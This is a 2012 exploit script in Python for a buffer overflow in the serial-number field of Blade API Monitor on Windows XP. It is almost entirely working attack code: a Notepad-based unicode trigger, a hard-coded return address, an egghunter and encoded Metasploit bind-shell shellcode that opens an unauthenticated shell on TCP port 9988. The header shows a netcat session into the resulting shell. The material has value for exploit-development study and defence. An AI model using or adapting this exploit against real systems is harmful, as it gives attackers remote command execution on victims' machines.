
# Title : Blade API Monitor Unicode Bypass (Serial Number BOF)
# Published : 2012-02-20
# Author :


#!/usr/bin/env python

#---------------------------------------------------------------------------------#
# Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF)                   #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com                      #
#                               http://www.fuzzysecurity.com/exploits/8.html      #
# OS: WinXP PRO SP3                                                               #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/     #
#           f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe    #
#                                                                                 #
# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/   #
#---------------------------------------------------------------------------------#
# This is a super strange exploit. First I would like to commend "FullMetalFouad" #
# for the unicode work on the original exploit. Originally I wanted to see if I   #
# could simplify the process. While I was doing that I lost sight of the fact     #
# that the instructions had to be printable since we need to copy them from a     #
# text file. When I opened my POC I saw that all the characters had been          #
# converted to weird blocks (check my site for a screenshot). On a whim I tried   #
# to paste these characters in the serial number field and amazingly the buffer   #
# in the debugger was intact but with one important difference, the unicode had   #
# been converted back to regular ASCII!! Very strange but super fortunate!! If    #
# you want to experiment with the exploit just keep in mind to (1) open it in     #
# windows notepad and (2) that all the characters need to be converted to those   #
# blocks for it to work (depending on your buffer this isn't always the case).    #
#---------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.128 9988                                          #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                       #
# Microsoft Windows XP [Version 5.1.2600]                                         #
# (C) Copyright 1985-2001 Microsoft Corp.                                         #
#                                                                                 #
# C:\Program Files\BladeAPIMonitor>ipconfig                                      #
# ipconfig                                                                        #
#                                                                                 #
# Windows IP Configuration                                                        #
#                                                                                 #
#                                                                                 #
# Ethernet adapter Local Area Connection:                                         #
#                                                                                 #
#        Connection-specific DNS Suffix  . : localdomain                          #
#        IP Address. . . . . . . . . . . . : 192.168.111.128                      #
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0                        #
#        Default Gateway . . . . . . . . . :                                      #
#                                                                                 #
# C:\Program Files\BladeAPIMonitor>                                              #
#---------------------------------------------------------------------------------#

# Output file. Per the header, open it in Windows Notepad and paste its contents
# into the serial-number field; the bytes are written raw, Notepad does the rest.
filename = "PasteMe.txt"

#---------------------------------------------------------------------------------#
# Originally unicode instructions to put an address in EAX, here it is used to    #
# trigger notepad bug and get UNICODE => ASCII conversion...                      #
#---------------------------------------------------------------------------------#
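# 20-byte prefix. In the original unicode exploit these were the instructions that
# put an address in EAX; here they are only used to trigger the Notepad conversion
# described in the header. Bytes literals so the exact bytes are emitted under both
# Python 2 and Python 3 (a str literal would be UTF-8-encoded by a text-mode write
# on Python 3, turning e.g. \xB8 into two bytes).
UniKill = (
    b"\xB8\x06\xAA\x6F\x50"
    b"\x6F\x4C\x6F\x58\x6F"
    b"\x05\x73\x00\x6F\xB0"  # note the embedded NUL
    b"\xB9\xD8\xAA\x6F\xE8"
)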

#Egghunter - Marker b33f
#Size 32-bytes
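# 32-byte egghunter, tag "b33f". The tag is embedded as the immediate of the
# `mov eax, ...` at offset 17 (bytes 18-21), little-endian: 0x66333362 == "b33f".
# The hunter scans memory for the tag written twice in a row ("b33fb33f") and
# jumps to what follows it; see `evil` below.
hunter = (
    b"\x66\x81\xca\xff"
    b"\x0f\x42\x52\x6a"
    b"\x02\x58\xcd\x2e"
    b"\x3c\x05\x5a\x74"
    b"\xef\xb8\x62\x33"  # b3
    b"\x33\x66\x8b\xfa"  # 3f
    b"\xaf\x75\xea\xaf"
    b"\x75\xe7\xff\xe7"
)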

#msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c
#Size 742-bytes
# NOTE: shell_bind_tcp opens an unauthenticated listener on TCP/9988. Anyone who can
# reach that port gets a shell as the user running BladeAPIMonitor.exe, so only use
# this on an isolated lab VM (or swap in a reverse payload / firewall the port).
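# 742-byte payload: windows/shell_bind_tcp (LPORT=9988) run through the
# x86/alpha_mixed encoder, i.e. a short decoder stub followed by an
# alphanumeric-only body. Bytes literals keep the raw bytes identical under
# Python 2 and 3.
shellcode = (
    b"\xd9\xe1\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
    b"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    b"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c"
    b"\x48\x68\x4b\x39\x37\x70\x45\x50\x53\x30\x71\x70\x4f\x79\x69"
    b"\x75\x34\x71\x79\x42\x53\x54\x4c\x4b\x71\x42\x64\x70\x6c\x4b"
    b"\x42\x72\x66\x6c\x6c\x4b\x73\x62\x57\x64\x4e\x6b\x73\x42\x36"
    b"\x48\x36\x6f\x4f\x47\x71\x5a\x44\x66\x56\x51\x49\x6f\x75\x61"
    b"\x69\x50\x4c\x6c\x45\x6c\x61\x71\x61\x6c\x63\x32\x44\x6c\x47"
    b"\x50\x49\x51\x6a\x6f\x56\x6d\x55\x51\x49\x57\x4b\x52\x58\x70"
    b"\x62\x72\x76\x37\x4e\x6b\x56\x32\x34\x50\x6c\x4b\x47\x32\x37"
    b"\x4c\x73\x31\x5a\x70\x6c\x4b\x61\x50\x62\x58\x4d\x55\x49\x50"
    b"\x63\x44\x50\x4a\x36\x61\x5a\x70\x50\x50\x6e\x6b\x33\x78\x74"
    b"\x58\x4c\x4b\x63\x68\x57\x50\x45\x51\x4a\x73\x38\x63\x67\x4c"
    b"\x42\x69\x4e\x6b\x56\x54\x6c\x4b\x47\x71\x7a\x76\x35\x61\x59"
    b"\x6f\x56\x51\x49\x50\x6e\x4c\x6b\x71\x4a\x6f\x46\x6d\x67\x71"
    b"\x48\x47\x46\x58\x59\x70\x62\x55\x4a\x54\x56\x63\x43\x4d\x79"
    b"\x68\x75\x6b\x73\x4d\x46\x44\x63\x45\x4b\x52\x61\x48\x6e\x6b"
    b"\x70\x58\x46\x44\x65\x51\x4b\x63\x32\x46\x4c\x4b\x44\x4c\x50"
    b"\x4b\x4c\x4b\x46\x38\x77\x6c\x65\x51\x6b\x63\x4c\x4b\x76\x64"
    b"\x6e\x6b\x56\x61\x38\x50\x6e\x69\x32\x64\x76\x44\x44\x64\x71"
    b"\x4b\x71\x4b\x75\x31\x73\x69\x72\x7a\x72\x71\x59\x6f\x59\x70"
    b"\x76\x38\x63\x6f\x51\x4a\x4c\x4b\x74\x52\x78\x6b\x4e\x66\x71"
    b"\x4d\x51\x78\x67\x43\x46\x52\x37\x70\x43\x30\x31\x78\x71\x67"
    b"\x51\x63\x35\x62\x71\x4f\x76\x34\x42\x48\x50\x4c\x53\x47\x31"
    b"\x36\x54\x47\x69\x6f\x49\x45\x68\x38\x4e\x70\x37\x71\x67\x70"
    b"\x35\x50\x37\x59\x7a\x64\x52\x74\x50\x50\x63\x58\x51\x39\x4b"
    b"\x30\x30\x6b\x75\x50\x39\x6f\x69\x45\x32\x70\x76\x30\x42\x70"
    b"\x66\x30\x73\x70\x62\x70\x31\x50\x42\x70\x43\x58\x49\x7a\x64"
    b"\x4f\x4b\x6f\x39\x70\x59\x6f\x5a\x75\x6b\x39\x78\x47\x30\x31"
    b"\x49\x4b\x62\x73\x33\x58\x74\x42\x43\x30\x65\x77\x53\x34\x4c"
    b"\x49\x4a\x46\x70\x6a\x44\x50\x46\x36\x56\x37\x63\x58\x79\x52"
    b"\x39\x4b\x34\x77\x55\x37\x6b\x4f\x38\x55\x62\x73\x76\x37\x53"
    b"\x58\x6f\x47\x4b\x59\x37\x48\x6b\x4f\x69\x6f\x58\x55\x72\x73"
    b"\x30\x53\x53\x67\x50\x68\x54\x34\x78\x6c\x65\x6b\x6b\x51\x39"
    b"\x6f\x6e\x35\x61\x47\x6c\x49\x78\x47\x73\x58\x31\x65\x70\x6e"
    b"\x30\x4d\x45\x31\x79\x6f\x49\x45\x43\x58\x50\x63\x70\x6d\x43"
    b"\x54\x67\x70\x4d\x59\x39\x73\x76\x37\x53\x67\x32\x77\x56\x51"
    b"\x69\x66\x30\x6a\x52\x32\x36\x39\x33\x66\x6a\x42\x6b\x4d\x62"
    b"\x46\x6b\x77\x30\x44\x34\x64\x35\x6c\x43\x31\x67\x71\x4c\x4d"
    b"\x50\x44\x74\x64\x32\x30\x6f\x36\x75\x50\x53\x74\x70\x54\x32"
    b"\x70\x70\x56\x56\x36\x76\x36\x62\x66\x76\x36\x72\x6e\x36\x36"
    b"\x52\x76\x71\x43\x30\x56\x73\x58\x64\x39\x7a\x6c\x35\x6f\x6c"
    b"\x46\x59\x6f\x6e\x35\x6b\x39\x59\x70\x70\x4e\x51\x46\x47\x36"
    b"\x39\x6f\x34\x70\x55\x38\x44\x48\x6c\x47\x37\x6d\x33\x50\x49"
    b"\x6f\x4a\x75\x6d\x6b\x5a\x50\x6f\x45\x79\x32\x72\x76\x55\x38"
    b"\x4f\x56\x4d\x45\x4f\x4d\x4f\x6d\x6b\x4f\x69\x45\x47\x4c\x67"
    b"\x76\x43\x4c\x55\x5a\x6d\x50\x79\x6b\x4d\x30\x51\x65\x33\x35"
    b"\x4f\x4b\x62\x67\x37\x63\x31\x62\x62\x4f\x53\x5a\x37\x70\x76"
    b"\x33\x49\x6f\x4b\x65\x41\x41"
)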

#---------------------------------------------------------------------------------#
# (*) Due to the weird conversion I couldn't do proper bad-char analysis         #
# (1) 0x00425e04 : push esp #  ret  | startnull,ascii ==> BladeAPIMonitor.exe     #
# (2) egghunter: We do this because we need more space than we have at ESP        #
# (3) alpha mixed Bindshell port 9988                                             #
#---------------------------------------------------------------------------------#

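# Stage 1: NOP sled + egghunter, placed right after the overwritten return address
# (ESP after the `push esp # ret` gadget).
egg = b"\x90" * 18 + hunter
# Stage 2: NOP sled, the doubled tag the hunter searches for, then the payload.
evil = b"\x90" * 10 + b"b33f" * 2 + shellcode

# Layout: Notepad trigger | 560 bytes filler | 0x00425e04 (push esp # ret, LE) |
#         egg | 500 bytes filler | tagged shellcode
# NOTE(review): the return address carries a leading NUL; the header reports the
# paste path delivers it intact, but confirm in a debugger before relying on it.
buffer = UniKill + b"A" * 560 + b"\x04\x5E\x42\x00" + egg + b"B" * 500 + evil

# Binary mode: no newline translation on Windows and no UTF-8 encoding of the
# high bytes on Python 3, so the file holds exactly `buffer`. The `with` block
# guarantees the handle is closed even if the write fails.
with open(filename, "wb") as textfile:
    textfile.write(buffer)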